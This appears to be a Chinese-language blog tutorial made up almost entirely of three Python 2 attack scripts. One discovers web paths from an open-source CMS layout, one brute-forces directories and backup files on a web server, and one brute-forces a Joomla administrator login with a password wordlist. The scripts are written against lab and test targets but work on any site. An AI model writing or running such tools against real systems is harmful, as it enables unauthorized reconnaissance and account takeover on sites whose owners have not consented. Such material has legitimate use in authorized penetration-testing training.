开源Web应用目录扫描器
这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码,感觉意义并不大
#!/usr/bin/python #coding=utf-8 import Queue import threading import os import urllib2 threads = 10 target = "http://10.10.10.144/dunling" directory = "/dunling" filters = [".jpg",".gif",".png",".css"] os.chdir(directory) web_paths = Queue.Queue() for r,d,f in os.walk("."): for files in f: remote_path = "%s/%s"%(r,files) if remote_path.startswith("."): remote_path = remote_path[1:] if os.path.splitext(files)[1] not in filters: web_paths.put(remote_path) def test_remote(): while not web_paths.empty(): path = web_paths.get() url = "%s%s"%(target,path) request = urllib2.Request(url) try: response = urllib2.urlopen(request) content = response.read() print "[%d] => %s"%(response.code,path) response.close() except urllib2.HTTPError as error: # print "Failed %s"%error.code pass for i in range(threads): print "Spawning thread : %d"%i t = threading.Thread(target=test_remote) t.start()
暴力破解目录和文件位置
#!/usr/bin/python #coding=utf-8 import urllib2 import threading import Queue import urllib threads = 50 target_url = "http://testphp.vulnweb.com" wordlist_file = "/tmp/all.txt" # from SVNDigger resume = None user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" def build_wordlist(wordlist_file): #读入字典文件 fd = open(wordlist_file,"rb") raw_words = fd.readlines() fd.close() found_resume = False words = Queue.Queue() for word in raw_words: word = word.rstrip() if resume is not None: if found_resume: words.put(word) else: if word == resume: found_resume = True print "Resuming wordlist from: %s"%resume else: words.put(word) return words def dir_bruter(word_queue,extensions=None): while not word_queue.empty(): attempt = word_queue.get() attempt_list = [] #检测是否有文件扩展名,若没有则就是要暴力破解的路径 if "." not in attempt: attempt_list.append("/%s/"%attempt) else: attempt_list.append("/%s"%attempt) #如果我们想暴破扩展 if extensions: for extension in extensions: attempt_list.append("/%s%s"%(attempt,extension)) #迭代我们要尝试的文件列表 for brute in attempt_list: url = "%s%s"%(target_url,urllib.quote(brute)) try: headers = {} headers["User-Agent"] = user_agent r = urllib2.Request(url,headers=headers) response = urllib2.urlopen(r) if len(response.read()): print "[%d] => %s"%(response.code,url) except urllib2.URLError, e: if hasattr(e,'code') and e.code != 404: print "!!! %d => %s"%(e.code,url) pass word_queue = build_wordlist(wordlist_file) extensions = [".php",".bak",".orig",".inc"] for i in range(threads): t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,)) t.start()
暴力破解HTML表格认证
1、检索登录页面,接受所有返回的cookies值;
2、从HTML中获取所有表单元素;
3、在你的字典中设置需要猜测的用户名和密码;
4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;
5、测试是否能登录成功。
#!/usr/bin/python #coding=utf-8 import urllib2 import urllib import cookielib import threading import sys import Queue from HTMLParser import HTMLParser #简要设置 user_thread = 10 username = "admin" wordlist_file = "/tmp/passwd.txt" resume = None #特定目标设置 target_url = "http://10.10.10.144/Joomla/administrator/index.php" target_post = "http://10.10.10.144/Joomla/administrator/index.php" username_field = "username" password_field = "passwd" success_check = "Administration - Control Panel" class Bruter(object): """docstring for Bruter""" def __init__(self, username, words): self.username = username self.password_q = words self.found = False print "Finished setting up for: %s"%username def run_bruteforce(self): for i in range(user_thread): t = threading.Thread(target=self.web_bruter) t.start() def web_bruter(self): while not self.password_q.empty() and not self.found: brute = self.password_q.get().rstrip() jar = cookielib.FileCookieJar("cookies") opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) response = opener.open(target_url) page = response.read() print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize()) #解析隐藏区域 parser = BruteParser() parser.feed(page) post_tags = parser.tag_results #添加我们的用户名和密码区域 post_tags[username_field] = self.username post_tags[password_field] = brute login_data = urllib.urlencode(post_tags) login_response = opener.open(target_post,login_data) login_result = login_response.read() if success_check in login_result: self.found = True print "[*] Bruteforce successful. " print "[*] Username: %s"%self.username print "[*] Password: %s"%brute print "[*] Waiting for other threads to exit ... " class BruteParser(HTMLParser): """docstring for BruteParser""" def __init__(self): HTMLParser.__init__(self) self.tag_results = {} def handle_starttag(self,tag,attrs): if tag == "input": tag_name = None tag_value = None for name,value in attrs: if name == "name": tag_name = value if name == "value": tag_value = value if tag_name is not None: self.tag_results[tag_name] = value def build_wordlist(wordlist_file): fd = open(wordlist_file,"rb") raw_words = fd.readlines() fd.close() found_resume = False words = Queue.Queue() for word in raw_words: word = word.rstrip() if resume is not None: if found_resume: words.put(word) else: if word == resume: found_resume = True print "Resuming wordlist from: %s"%resume else: words.put(word) return words words = build_wordlist(wordlist_file) brute_obj = Bruter(username,words) brute_obj.run_bruteforce()